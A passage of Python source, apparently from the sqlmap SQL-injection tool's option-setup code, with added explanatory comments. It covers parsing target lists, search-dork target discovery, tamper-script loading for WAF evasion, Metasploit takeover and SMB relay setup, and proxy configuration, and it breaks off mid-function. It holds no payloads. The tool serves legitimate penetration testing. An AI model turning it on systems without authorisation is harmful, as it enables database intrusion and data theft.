        # and the `in` operator.
        class DictObject(object):
            def __init__(self):
                self.__dict__ = {}

            def __contains__(self, name):
                return name in self.__dict__

        if container is None:
            container = DictObject()

        for child in node.findall("*"):
            entry = DictObject()
            container.__dict__[child.tag] = entry
            if child.attrib:
                # Leaf: copy the XML attributes straight onto the bag
                entry.__dict__.update(child.attrib)
            else:
                # Branch: recurse into the child's children
                iterate(child, entry)

        return container

    tree = ElementTree()

    try:
        tree.parse(paths.QUERIES_XML)
    except Exception as ex:
        errMsg = "something appears to be wrong with "
        errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, getSafeExString(ex))
        errMsg += "sure that you haven't made any changes to it"
        raise SqlmapInstallationException(errMsg)

    # Top-level nodes are keyed by their DBMS name ('value' attribute)
    for node in tree.findall("*"):
        queries[node.attrib['value']] = iterate(node)
def _setMultipleTargets():
    """
    Define a configuration parameter if we are running in multiple target
    mode.
    """

    initialTargetsCount = len(kb.targets)
    seen = set()

    def _addTarget(target):
        # Deduplicate on URL + POST data with parameter *values* blanked out,
        # so requests differing only in parameter values count as one target
        # (this key-building logic was previously duplicated in both the
        # file and directory branches below).
        url, _, data, _, _ = target
        key = re.sub(r"(\w+=)[^%s ]*" % (conf.paramDel or DEFAULT_GET_POST_DELIMITER), r"\g<1>", "%s %s" % (url, data))
        if key not in seen:
            kb.targets.add(target)
            seen.add(key)

    if not conf.logFile:
        return

    debugMsg = "parsing targets list from '%s'" % conf.logFile
    logger.debug(debugMsg)

    if not os.path.exists(conf.logFile):
        errMsg = "the specified list of targets does not exist"
        raise SqlmapFilePathException(errMsg)

    if os.path.isfile(conf.logFile):
        for target in parseRequestFile(conf.logFile):
            _addTarget(target)
    elif os.path.isdir(conf.logFile):
        files = os.listdir(conf.logFile)
        files.sort()

        for reqFile in files:
            # Only files named like '<N>-request*' are considered
            if not re.search(r"([\d]+)\-request", reqFile):
                continue

            for target in parseRequestFile(os.path.join(conf.logFile, reqFile)):
                _addTarget(target)
    else:
        errMsg = "the specified list of targets is not a file "
        errMsg += "nor a directory"
        raise SqlmapFilePathException(errMsg)

    updatedTargetsCount = len(kb.targets)

    if updatedTargetsCount > initialTargetsCount:
        infoMsg = "sqlmap parsed %d " % (updatedTargetsCount - initialTargetsCount)
        infoMsg += "(parameter unique) requests from the "
        infoMsg += "targets list ready to be tested"
        logger.info(infoMsg)
def _adjustLoggingFormatter():
    """
    Solves problem of line deletition caused by overlapping logging messages
    and retrieved data info in inference mode
    """

    if hasattr(FORMATTER, '_format'):
        # Already monkey-patched; never wrap the formatter twice.
        return

    def _patched(record):
        result = boldifyMessage(FORMATTER._format(record))
        if kb.get("prependFlag"):
            # One-shot flag: start the message on a fresh line, then reset.
            result = "\n%s" % result
            kb.prependFlag = False
        return result

    # Stash the original implementation under `_format`, install the wrapper.
    FORMATTER._format = FORMATTER.format
    FORMATTER.format = _patched
def _setRequestFromFile():
    """
    This function checks if the way to make a HTTP request is through supplied
    textual file, parses it and saves the information into the knowledge base.
    """

    if conf.requestFile:
        conf.requestFile = safeExpandUser(conf.requestFile)
        seenUrls = set()

        if not os.path.isfile(conf.requestFile):
            errMsg = "specified HTTP request file '%s' " % conf.requestFile
            errMsg += "does not exist"
            raise SqlmapFilePathException(errMsg)

        infoMsg = "parsing HTTP request from '%s'" % conf.requestFile
        logger.info(infoMsg)

        # Register each parsed target once, keyed on its URL
        for target in parseRequestFile(conf.requestFile):
            url = target[0]
            if url not in seenUrls:
                kb.targets.add(target)
                seenUrls.add(url)

    if conf.secondReq:
        conf.secondReq = safeExpandUser(conf.secondReq)

        if not os.path.isfile(conf.secondReq):
            errMsg = "specified second-order HTTP request file '%s' " % conf.secondReq
            errMsg += "does not exist"
            raise SqlmapFilePathException(errMsg)

        infoMsg = "parsing second-order HTTP request from '%s'" % conf.secondReq
        logger.info(infoMsg)

        # Only the first request from the file becomes the second-order one
        kb.secondReq = next(parseRequestFile(conf.secondReq, False))
def _setCrawler():
    """
    Crawls the target (or each bulk-file/sitemap target) for additional
    links when '--crawl' is used.
    """
    if not conf.crawlDepth:
        return

    if not any((conf.bulkFile, conf.sitemapUrl)):
        crawl(conf.url)
    else:
        if conf.bulkFile:
            targets = getFileItems(conf.bulkFile)
        else:
            targets = parseSitemap(conf.sitemapUrl)

        for i in xrange(len(targets)):
            try:
                target = targets[i]
                crawl(target)

                if conf.verbose in (1, 2):
                    status = "%d/%d links visited (%d%%)" % (i + 1, len(targets), round(100.0 * (i + 1) / len(targets)))
                    dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True)
            except KeyboardInterrupt:
                # Consistent with _findPageForms(): let the user abort the
                # multi-target crawling loop without killing the whole run
                # (KeyboardInterrupt is not caught by `except Exception`).
                break
            except Exception as ex:
                errMsg = "problem occurred while crawling at '%s' ('%s')" % (target, getSafeExString(ex))
                logger.error(errMsg)
def _doSearch():
    """
    This function performs search dorking, parses results
    and saves the testable hosts into the knowledge base.
    """
    if not conf.googleDork:
        return
    kb.data.onlyGETs = None
    def retrieve():
        # Fetch one page of search results for the dork expression
        links = search(conf.googleDork)
        if not links:
            errMsg = "unable to find results for your "
            errMsg += "search dork expression"
            raise SqlmapGenericException(errMsg)
        for link in links:
            link = urldecode(link)
            if re.search(r"(.*?)\?(.+)", link):
                # Link carries GET parameters - directly testable
                kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
            elif re.search(URI_INJECTABLE_REGEX, link, re.I):
                # NOTE(review): conf.googleDork is guaranteed truthy here (guard
                # at the top of _doSearch), so this prompt appears unreachable
                # and URI-injectable links are always added -- confirm intent.
                if kb.data.onlyGETs is None and conf.data is None and not conf.googleDork:
                    message = "do you want to scan only results containing GET parameters? [Y/n] "
                    kb.data.onlyGETs = readInput(message, default='Y', boolean=True)
                if not kb.data.onlyGETs or conf.googleDork:
                    kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
        return links
    while True:
        links = retrieve()
        if kb.targets:
            infoMsg = "sqlmap got %d results for your " % len(links)
            infoMsg += "search dork expression, "
            if len(links) == len(kb.targets):
                infoMsg += "all "
            else:
                infoMsg += "%d " % len(kb.targets)
            infoMsg += "of them are testable targets"
            logger.info(infoMsg)
            break
        else:
            message = "sqlmap got %d results " % len(links)
            message += "for your search dork expression, but none of them "
            message += "have GET parameters to test for SQL injection. "
            message += "Do you want to skip to the next result page? [Y/n]"
            if not readInput(message, default='Y', boolean=True):
                raise SqlmapSilentQuitException
            else:
                # Advance to the next search result page and retry
                conf.googlePage += 1
def _setBulkMultipleTargets():
    """
    Parses the '--bulk-file' list and registers every usable line (one with
    GET parameters or a custom injection mark) as a target.
    """
    if not conf.bulkFile:
        return

    conf.bulkFile = safeExpandUser(conf.bulkFile)

    infoMsg = "parsing multiple targets list from '%s'" % conf.bulkFile
    logger.info(infoMsg)

    if not os.path.isfile(conf.bulkFile):
        errMsg = "the specified bulk file "
        errMsg += "does not exist"
        raise SqlmapFilePathException(errMsg)

    found = False
    for line in getFileItems(conf.bulkFile):
        usable = re.match(r"[^ ]+\?(.+)", line, re.I) or kb.customInjectionMark in line
        if usable:
            found = True
            kb.targets.add((line.strip(), conf.method, conf.data, conf.cookie, None))

    if not found and not conf.forms and not conf.crawlDepth:
        warnMsg = "no usable links found (with GET parameters)"
        logger.warn(warnMsg)
def _setSitemapTargets():
    """
    Parses the sitemap given via '--sitemap-url' and registers every entry
    carrying GET parameters as a target.
    """
    if not conf.sitemapUrl:
        return

    infoMsg = "parsing sitemap '%s'" % conf.sitemapUrl
    logger.info(infoMsg)

    matches = 0
    for entry in parseSitemap(conf.sitemapUrl):
        if re.match(r"[^ ]+\?(.+)", entry, re.I):
            matches += 1
            kb.targets.add((entry.strip(), None, None, None, None))

    if matches == 0 and not conf.forms and not conf.crawlDepth:
        warnMsg = "no usable links found (with GET parameters)"
        logger.warn(warnMsg)
def _findPageForms():
    """
    Requests the target page(s) and registers any HTML forms found there as
    injection targets ('--forms').
    """
    # When crawling, forms discovery is presumably handled along the crawl
    # path instead -- confirm against _setCrawler/crawl()
    if not conf.forms or conf.crawlDepth:
        return
    if conf.url and not checkConnection():
        return
    infoMsg = "searching for forms"
    logger.info(infoMsg)
    if not any((conf.bulkFile, conf.googleDork, conf.sitemapUrl)):
        # Single-target mode: fetch the page once and parse its forms
        page, _, _ = Request.queryPage(content=True)
        findPageForms(page, conf.url, True, True)
    else:
        if conf.bulkFile:
            targets = getFileItems(conf.bulkFile)
        elif conf.sitemapUrl:
            targets = parseSitemap(conf.sitemapUrl)
        elif conf.googleDork:
            # Search results already populated kb.targets; consume them and
            # re-register only their discovered forms
            targets = [_[0] for _ in kb.targets]
            kb.targets.clear()
        for i in xrange(len(targets)):
            try:
                target = targets[i]
                page, _, _ = Request.getPage(url=target.strip(), crawling=True, raise404=False)
                findPageForms(page, target, False, True)
                if conf.verbose in (1, 2):
                    status = '%d/%d links visited (%d%%)' % (i + 1, len(targets), round(100.0 * (i + 1) / len(targets)))
                    dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True)
            except KeyboardInterrupt:
                # Ctrl-C aborts the multi-target loop, not the whole run
                break
            except Exception as ex:
                errMsg = "problem occurred while searching for forms at '%s' ('%s')" % (target, getSafeExString(ex))
                logger.error(errMsg)
def _setDBMSAuthentication():
    """
    Check and set the DBMS authentication credentials to run statements as
    another user, not the session user
    """

    if not conf.dbmsCred:
        return

    debugMsg = "setting the DBMS authentication credentials"
    logger.debug(debugMsg)

    credMatch = re.search(r"^(.+?):(.*?)$", conf.dbmsCred)

    if credMatch is None:
        errMsg = "DBMS authentication credentials value must be in format "
        errMsg += "username:password"
        raise SqlmapSyntaxException(errMsg)

    # Username is everything up to the first colon; the rest is the password
    conf.dbmsUsername, conf.dbmsPassword = credMatch.groups()
def _setMetasploit():
    """
    Locates and validates a local Metasploit Framework installation required
    by the takeover options (conf.osPwn / conf.osSmb / conf.osBof).
    """
    if not conf.osPwn and not conf.osSmb and not conf.osBof:
        return
    debugMsg = "setting the takeover out-of-band functionality"
    logger.debug(debugMsg)
    msfEnvPathExists = False
    if IS_WIN:
        # pywin32 is required on Windows for the takeover machinery
        try:
            __import__("win32file")
        except ImportError:
            errMsg = "sqlmap requires third-party module 'pywin32' "
            errMsg += "in order to use Metasploit functionalities on "
            errMsg += "Windows. You can download it from "
            errMsg += "'https://sourceforge.net/projects/pywin32/files/pywin32/'"
            raise SqlmapMissingDependence(errMsg)
        if not conf.msfPath:
            # Best-effort lookup of the Metasploit install path via the
            # Windows registry (Python 2 `_winreg` module)
            def _(key, value):
                retVal = None
                try:
                    from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE
                    _ = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
                    _ = OpenKey(_, key)
                    retVal = QueryValueEx(_, value)[0]
                except:
                    logger.debug("unable to identify Metasploit installation path via registry key")
                return retVal
            conf.msfPath = _(r"SOFTWARE\Rapid7\Metasploit", "Location")
            if conf.msfPath:
                conf.msfPath = os.path.join(conf.msfPath, "msf3")
    if conf.osSmb:
        isAdmin = runningAsAdmin()
        if not isAdmin:
            errMsg = "you need to run sqlmap as an administrator "
            errMsg += "if you want to perform a SMB relay attack because "
            errMsg += "it will need to listen on a user-specified SMB "
            errMsg += "TCP port for incoming connection attempts"
            raise SqlmapMissingPrivileges(errMsg)
    if conf.msfPath:
        # Accept either the given path or its 'bin' subdirectory; the
        # msfvenom-vs-msfencode/msfpayload check distinguishes new from
        # old framework layouts (kb.oldMsf)
        for path in (conf.msfPath, os.path.join(conf.msfPath, "bin")):
            if any(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfcli", "msfconsole")):
                msfEnvPathExists = True
                if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfvenom",)):
                    kb.oldMsf = False
                elif all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfencode", "msfpayload")):
                    kb.oldMsf = True
                else:
                    msfEnvPathExists = False
                conf.msfPath = path
                break
        if msfEnvPathExists:
            debugMsg = "provided Metasploit Framework path "
            debugMsg += "'%s' is valid" % conf.msfPath
            logger.debug(debugMsg)
        else:
            warnMsg = "the provided Metasploit Framework path "
            warnMsg += "'%s' is not valid. The cause could " % conf.msfPath
            warnMsg += "be that the path does not exists or that one "
            warnMsg += "or more of the needed Metasploit executables "
            warnMsg += "within msfcli, msfconsole, msfencode and "
            warnMsg += "msfpayload do not exist"
            logger.warn(warnMsg)
    else:
        warnMsg = "you did not provide the local path where Metasploit "
        warnMsg += "Framework is installed"
        logger.warn(warnMsg)
    if not msfEnvPathExists:
        # Fall back to scanning every directory on PATH for the executables
        warnMsg = "sqlmap is going to look for Metasploit Framework "
        warnMsg += "installation inside the environment path(s)"
        logger.warn(warnMsg)
        envPaths = os.environ.get("PATH", "").split(";" if IS_WIN else ":")
        for envPath in envPaths:
            envPath = envPath.replace(";", "")
            if any(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfcli", "msfconsole")):
                msfEnvPathExists = True
                if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfvenom",)):
                    kb.oldMsf = False
                elif all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfencode", "msfpayload")):
                    kb.oldMsf = True
                else:
                    msfEnvPathExists = False
                if msfEnvPathExists:
                    infoMsg = "Metasploit Framework has been found "
                    infoMsg += "installed in the '%s' path" % envPath
                    logger.info(infoMsg)
                    conf.msfPath = envPath
                    break
    if not msfEnvPathExists:
        errMsg = "unable to locate Metasploit Framework installation. "
        errMsg += "You can get it at 'https://www.metasploit.com/download/'"
        raise SqlmapFilePathException(errMsg)
def _setWriteFile():
    """
    Validates the file upload options: the local source file ('--file-write')
    must exist and a remote destination path ('--file-dest') must be given.
    """
    if not conf.fileWrite:
        return
    debugMsg = "setting the write file functionality"
    logger.debug(debugMsg)
    if not os.path.exists(conf.fileWrite):
        errMsg = "the provided local file '%s' does not exist" % conf.fileWrite
        raise SqlmapFilePathException(errMsg)
    if not conf.fileDest:
        errMsg = "you did not provide the back-end DBMS absolute path "
        errMsg += "where you want to write the local file '%s'" % conf.fileWrite
        raise SqlmapMissingMandatoryOptionException(errMsg)
    # Remember the detected file type for the later upload step
    # (semantics defined by getFileType)
    conf.fileWriteType = getFileType(conf.fileWrite)
def _setOS():
    """
    Force the back-end DBMS operating system option.
    """
    if not conf.os:
        return
    if conf.os.lower() not in SUPPORTED_OS:
        errMsg = "you provided an unsupported back-end DBMS operating "
        errMsg += "system. The supported DBMS operating systems for OS "
        errMsg += "and file system access are %s. " % ', '.join([o.capitalize() for o in SUPPORTED_OS])
        errMsg += "If you do not know the back-end DBMS underlying OS, "
        errMsg += "do not provide it and sqlmap will fingerprint it for "
        errMsg += "you."
        raise SqlmapUnsupportedDBMSException(errMsg)
    debugMsg = "forcing back-end DBMS operating system to user defined "
    debugMsg += "value '%s'" % conf.os
    logger.debug(debugMsg)
    # Note: validation above used conf.os.lower(), but the value is stored
    # with its original casing
    Backend.setOs(conf.os)
def _setTechnique():
    """
    Translates the '--technique' string (e.g. "BEU") into the list of
    internal PAYLOAD.TECHNIQUE enum values stored back into conf.tech.
    """
    validTechniques = sorted(getPublicTypeMembers(PAYLOAD.TECHNIQUE), key=lambda x: x[1])
    # One uppercase letter per technique (its name's first character)
    validLetters = [_[0][0].upper() for _ in validTechniques]

    if conf.tech and isinstance(conf.tech, basestring):
        selected = []

        for letter in conf.tech.upper():
            if letter not in validLetters:
                errMsg = "value for --technique must be a string composed "
                errMsg += "by the letters %s. Refer to the " % ", ".join(validLetters)
                errMsg += "user's manual for details"
                raise SqlmapSyntaxException(errMsg)

            # Map the letter back onto its enum value
            for validTech, validInt in validTechniques:
                if letter == validTech[0]:
                    selected.append(validInt)
                    break

        conf.tech = selected
def _setDBMS():
    """
    Force the back-end DBMS option.
    """

    if not conf.dbms:
        return

    debugMsg = "forcing back-end DBMS to user defined value"
    logger.debug(debugMsg)

    conf.dbms = conf.dbms.lower()

    # Allow an optional trailing version, e.g. "mysql 5.0"
    regex = re.search(r"%s ([\d\.]+)" % ("(%s)" % "|".join(list(SUPPORTED_DBMS))), conf.dbms, re.I)

    if regex:
        conf.dbms = regex.group(1)
        Backend.setVersion(regex.group(2))

    if conf.dbms not in SUPPORTED_DBMS:
        errMsg = "you provided an unsupported back-end database management "
        errMsg += "system. Supported DBMSes are as follows: %s. " % ', '.join(sorted(DBMS_DICT))
        errMsg += "If you do not know the back-end DBMS, do not provide "
        errMsg += "it and sqlmap will fingerprint it for you."
        raise SqlmapUnsupportedDBMSException(errMsg)

    # Canonicalize any alias (e.g. "postgres") to its main DBMS name
    for dbms, aliases in DBMS_ALIASES:
        if conf.dbms in aliases:
            conf.dbms = dbms
            break
def _listTamperingFunctions():
    """
    Lists available tamper functions
    """

    if not conf.listTampers:
        return

    infoMsg = "listing available tamper scripts\n"
    logger.info(infoMsg)

    for script in sorted(glob.glob(os.path.join(paths.SQLMAP_TAMPER_PATH, "*.py"))):
        content = openFile(script, "rb").read()
        # Pull the module docstring following the __priority__ marker and
        # print only its first paragraph, collapsed onto one line
        match = re.search(r'(?s)__priority__.+"""(.+)"""', content)
        if match:
            comment = match.group(1).strip()
            dataToStdout("* %s - %s\n" % (setColor(os.path.basename(script), "yellow"), re.sub(r" *\n *", " ", comment.split("\n\n")[0].strip())))
def _setTamperingFunctions():
    """
    Loads tampering functions from given script(s)
    """
    if conf.tamper:
        last_priority = PRIORITY.HIGHEST
        check_priority = True
        resolve_priorities = False
        priorities = []
        for script in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper):
            found = False
            # Py2: work with byte paths in the filesystem encoding
            path = paths.SQLMAP_TAMPER_PATH.encode(sys.getfilesystemencoding() or UNICODE_ENCODING)
            script = script.strip().encode(sys.getfilesystemencoding() or UNICODE_ENCODING)
            try:
                if not script:
                    continue
                # Bare names resolve against the bundled tamper directory,
                # with or without the '.py' suffix
                elif os.path.exists(os.path.join(path, script if script.endswith(".py") else "%s.py" % script)):
                    script = os.path.join(path, script if script.endswith(".py") else "%s.py" % script)
                elif not os.path.exists(script):
                    errMsg = "tamper script '%s' does not exist" % script
                    raise SqlmapFilePathException(errMsg)
                elif not script.endswith(".py"):
                    errMsg = "tamper script '%s' should have an extension '.py'" % script
                    raise SqlmapSyntaxException(errMsg)
            except UnicodeDecodeError:
                errMsg = "invalid character provided in option '--tamper'"
                raise SqlmapSyntaxException(errMsg)
            dirname, filename = os.path.split(script)
            dirname = os.path.abspath(dirname)
            infoMsg = "loading tamper module '%s'" % filename[:-3]
            logger.info(infoMsg)
            # The script's directory must be an importable package
            if not os.path.exists(os.path.join(dirname, "__init__.py")):
                errMsg = "make sure that there is an empty file '__init__.py' "
                errMsg += "inside of tamper scripts directory '%s'" % dirname
                raise SqlmapGenericException(errMsg)
            if dirname not in sys.path:
                sys.path.insert(0, dirname)
            try:
                module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING))
            except Exception as ex:
                raise SqlmapSyntaxException("cannot import tamper module '%s' (%s)" % (filename[:-3], getSafeExString(ex)))
            priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__
            for name, function in inspect.getmembers(module, inspect.isfunction):
                # Accept only the canonical signature: tamper(payload, **kwargs)
                if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs":
                    found = True
                    kb.tamperFunctions.append(function)
                    # Rename the function after its module for clearer logs
                    function.func_name = module.__name__
                    # Scripts are expected in descending priority order; offer
                    # to auto-sort them on the first out-of-order occurrence
                    if check_priority and priority > last_priority:
                        message = "it appears that you might have mixed "
                        message += "the order of tamper scripts. "
                        message += "Do you want to auto resolve this? [Y/n/q] "
                        choice = readInput(message, default='Y').upper()
                        if choice == 'N':
                            resolve_priorities = False
                        elif choice == 'Q':
                            raise SqlmapUserQuitException
                        else:
                            resolve_priorities = True
                        check_priority = False
                    priorities.append((priority, function))
                    last_priority = priority
                    break
                elif name == "dependencies":
                    # Optional hook letting a script verify its own deps
                    try:
                        function()
                    except Exception as ex:
                        errMsg = "error occurred while checking dependencies "
                        errMsg += "for tamper module '%s' ('%s')" % (filename[:-3], getSafeExString(ex))
                        raise SqlmapGenericException(errMsg)
            if not found:
                errMsg = "missing function 'tamper(payload, **kwargs)' "
                errMsg += "in tamper script '%s'" % script
                raise SqlmapGenericException(errMsg)
        if kb.tamperFunctions and len(kb.tamperFunctions) > 3:
            warnMsg = "using too many tamper scripts is usually not "
            warnMsg += "a good idea"
            logger.warning(warnMsg)
        # Re-register the functions sorted by descending priority if requested
        if resolve_priorities and priorities:
            priorities.sort(reverse=True)
            kb.tamperFunctions = []
            for _, function in priorities:
                kb.tamperFunctions.append(function)
def _setWafFunctions():
    """
    Loads WAF/IPS detecting functions from script(s)
    """
    if not conf.identifyWaf:
        return

    for scriptPath in glob.glob(os.path.join(paths.SQLMAP_WAF_PATH, "*.py")):
        directory, scriptName = os.path.split(scriptPath)
        directory = os.path.abspath(directory)

        if scriptName == "__init__.py":
            continue

        moduleName = scriptName[:-3]

        debugMsg = "loading WAF script '%s'" % moduleName
        logger.debug(debugMsg)

        if directory not in sys.path:
            sys.path.insert(0, directory)

        try:
            # Force a fresh import in case a module of the same name is cached
            if moduleName in sys.modules:
                del sys.modules[moduleName]
            module = __import__(moduleName.encode(sys.getfilesystemencoding() or UNICODE_ENCODING))
        except ImportError as ex:
            raise SqlmapSyntaxException("cannot import WAF script '%s' (%s)" % (moduleName, getSafeExString(ex)))

        members = dict(inspect.getmembers(module))

        if "detect" not in members:
            errMsg = "missing function 'detect(get_page)' "
            errMsg += "in WAF script '%s'" % scriptPath
            raise SqlmapGenericException(errMsg)
        else:
            kb.wafFunctions.append((members["detect"], members.get("__product__", moduleName)))

    # Stable sort pushes "generic" detectors behind product-specific ones
    kb.wafFunctions = sorted(kb.wafFunctions, key=lambda _: "generic" in _[1].lower())
def _setThreads():
    # Normalize the thread count: anything that is not a positive integer
    # falls back to single-threaded operation
    usable = isinstance(conf.threads, int) and conf.threads > 0
    if not usable:
        conf.threads = 1
def _setDNSCache():
    """
    Makes a cached version of socket._getaddrinfo to avoid subsequent DNS requests.
    """

    def _getaddrinfo(*args, **kwargs):
        # Resolve once per distinct positional-argument tuple; later calls
        # are served straight from the knowledge-base cache
        if args not in kb.cache.addrinfo:
            kb.cache.addrinfo[args] = socket._getaddrinfo(*args, **kwargs)

        return kb.cache.addrinfo[args]

    # Install the wrapper only once (the original resolver is stashed
    # on the socket module under a private name)
    if not hasattr(socket, "_getaddrinfo"):
        socket._getaddrinfo = socket.getaddrinfo
        socket.getaddrinfo = _getaddrinfo
def _setSocketPreConnect():
    """
    Makes a pre-connect version of socket.connect
    """
    if conf.disablePrecon:
        return

    def _thread():
        # Background worker: keeps a small pool of already-connected sockets
        # per (family, type, proto, address) key so request threads can skip
        # the TCP handshake latency
        while kb.get("threadContinue") and not conf.get("disablePrecon"):
            try:
                for key in socket._ready:
                    if len(socket._ready[key]) < SOCKET_PRE_CONNECT_QUEUE_SIZE:
                        family, type, proto, address = key
                        s = socket.socket(family, type, proto)
                        # _connect is the saved original socket.socket.connect
                        s._connect(address)

                        try:
                            if type == socket.SOCK_STREAM:
                                # Reference: https://www.techrepublic.com/article/tcp-ip-options-for-high-performance-data-transmission/
                                s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
                        except:
                            pass

                        with kb.locks.socket:
                            # NOTE: _sock is a Python 2 socket internal -
                            # the raw underlying socket object
                            socket._ready[key].append((s._sock, time.time()))
            except KeyboardInterrupt:
                break
            except:
                # best-effort: any pre-connect failure is simply retried later
                pass
            finally:
                time.sleep(0.01)

    def connect(self, address):
        # Replacement for socket.socket.connect: reuse a sufficiently fresh
        # pre-connected socket when available, otherwise do a real connect
        found = False
        key = (self.family, self.type, self.proto, address)

        with kb.locks.socket:
            if key not in socket._ready:
                socket._ready[key] = []

            while len(socket._ready[key]) > 0:
                candidate, created = socket._ready[key].pop(0)
                if (time.time() - created) < PRECONNECT_CANDIDATE_TIMEOUT:
                    self._sock = candidate
                    found = True
                    break
                else:
                    # too old - discard it cleanly
                    try:
                        candidate.shutdown(socket.SHUT_RDWR)
                        candidate.close()
                    except socket.error:
                        pass

        if not found:
            self._connect(address)

    # Patch only once per process; the original connect is preserved as
    # socket.socket._connect
    if not hasattr(socket.socket, "_connect"):
        socket._ready = {}
        socket.socket._connect = socket.socket.connect
        socket.socket.connect = connect

        thread = threading.Thread(target=_thread)
        setDaemon(thread)
        thread.start()
def _setHTTPHandlers():
    """
    Check and set the HTTP/SOCKS proxy for all HTTP requests.
    """
    global proxyHandler

    # Drop opener method caches left over from a previous initialization
    for _ in ("http", "https"):
        if hasattr(proxyHandler, "%s_open" % _):
            delattr(proxyHandler, "%s_open" % _)

    if conf.proxyList is not None:
        # Rotate through a user-supplied proxy list (one per call)
        if not conf.proxyList:
            errMsg = "list of usable proxies is exhausted"
            raise SqlmapNoneDataException(errMsg)

        conf.proxy = conf.proxyList[0]
        conf.proxyList = conf.proxyList[1:]

        infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy
        logger.info(infoMsg)
    elif not conf.proxy:
        if conf.hostname in ("localhost", "127.0.0.1") or conf.ignoreProxy:
            proxyHandler.proxies = {}

    if conf.proxy:
        debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests"
        logger.debug(debugMsg)

        try:
            _ = urlparse.urlsplit(conf.proxy)
        except Exception as ex:
            errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, getSafeExString(ex))
            raise SqlmapSyntaxException(errMsg)

        hostnamePort = _.netloc.split(":")

        scheme = _.scheme.upper()
        hostname = hostnamePort[0]
        port = None
        username = None
        password = None

        if len(hostnamePort) == 2:
            try:
                port = int(hostnamePort[1])
            except:
                pass  # drops into the next check block

        # port stays None on a parse failure, so this also rejects
        # non-numeric port values
        if not all((scheme, hasattr(PROXY_TYPE, scheme), hostname, port)):
            errMsg = "proxy value must be in format '(%s)://address:port'" % "|".join(_[0].lower() for _ in getPublicTypeMembers(PROXY_TYPE))
            raise SqlmapSyntaxException(errMsg)

        if conf.proxyCred:
            _ = re.search(r"\A(.*?):(.*?)\Z", conf.proxyCred)
            if not _:
                errMsg = "proxy authentication credentials "
                errMsg += "value must be in format username:password"
                raise SqlmapSyntaxException(errMsg)
            else:
                username = _.group(1)
                password = _.group(2)

        if scheme in (PROXY_TYPE.SOCKS4, PROXY_TYPE.SOCKS5):
            # SOCKS proxying is done by wrapping urllib2's socket module
            proxyHandler.proxies = {}

            socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if scheme == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, hostname, port, username=username, password=password)
            socks.wrapmodule(urllib2)
        else:
            socks.unwrapmodule(urllib2)

            if conf.proxyCred:
                # Reference: http://stackoverflow.com/questions/34079/how-to-specify-an-authenticated-proxy-for-a-python-http-connection
                proxyString = "%s@" % conf.proxyCred
            else:
                proxyString = ""

            proxyString += "%s:%d" % (hostname, port)
            proxyHandler.proxies = {"http": proxyString, "https": proxyString}

        proxyHandler.__init__(proxyHandler.proxies)

    debugMsg = "creating HTTP requests opener object"
    logger.debug(debugMsg)

    # NOTE: Python 2 filter() returns a list here, allowing append() below
    handlers = filter(None, [multipartPostHandler, proxyHandler if proxyHandler.proxies else None, authHandler, redirectHandler, rangeHandler, httpsHandler])

    if not conf.dropSetCookie:
        if not conf.loadCookies:
            conf.cj = cookielib.CookieJar()
        else:
            conf.cj = cookielib.MozillaCookieJar()
            resetCookieJar(conf.cj)

        handlers.append(urllib2.HTTPCookieProcessor(conf.cj))

    # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html
    if conf.keepAlive:
        warnMsg = "persistent HTTP(s) connections, Keep-Alive, has "
        warnMsg += "been disabled because of its incompatibility "

        if conf.proxy:
            warnMsg += "with HTTP(s) proxy"
            logger.warn(warnMsg)
        elif conf.authType:
            warnMsg += "with authentication methods"
            logger.warn(warnMsg)
        else:
            handlers.append(keepAliveHandler)

    opener = urllib2.build_opener(*handlers)
    urllib2.install_opener(opener)
def _setSafeVisit():
    """
    Check and set the safe visit options.
    """
    if not any((conf.safeUrl, conf.safeReqFile)):
        return

    if conf.safeReqFile:
        checkFile(conf.safeReqFile)

        raw = readCachedFileContent(conf.safeReqFile)
        # Expect a raw HTTP request: "METHOD /path HTTP/x.y" on the first line
        match = re.search(r"\A([A-Z]+) ([^ ]+) HTTP/[0-9.]+\Z", raw[:raw.find('\n')])

        if match:
            kb.safeReq.method = match.group(1)
            kb.safeReq.url = match.group(2)
            kb.safeReq.headers = {}

            # Parse header lines until the first non-header line (blank
            # line or body) is reached
            for line in raw[raw.find('\n') + 1:].split('\n'):
                line = line.strip()
                if line and ':' in line:
                    key, value = line.split(':', 1)
                    value = value.strip()
                    kb.safeReq.headers[key] = value
                    if key.upper() == HTTP_HEADER.HOST.upper():
                        # Resolve the request path against the Host header,
                        # inferring https from an explicit :443 suffix
                        if not value.startswith("http"):
                            scheme = "http"
                            if value.endswith(":443"):
                                scheme = "https"
                            value = "%s://%s" % (scheme, value)
                        kb.safeReq.url = urlparse.urljoin(value, kb.safeReq.url)
                else:
                    break

            post = None

            # Body starts after the first blank line (CRLF or LF style)
            if '\r\n\r\n' in raw:
                post = raw[raw.find('\r\n\r\n') + 4:]
            elif '\n\n' in raw:
                post = raw[raw.find('\n\n') + 2:]

            if post and post.strip():
                kb.safeReq.post = post
            else:
                kb.safeReq.post = None
        else:
            errMsg = "invalid format of a safe request file"
            raise SqlmapSyntaxException(errMsg)
    else:
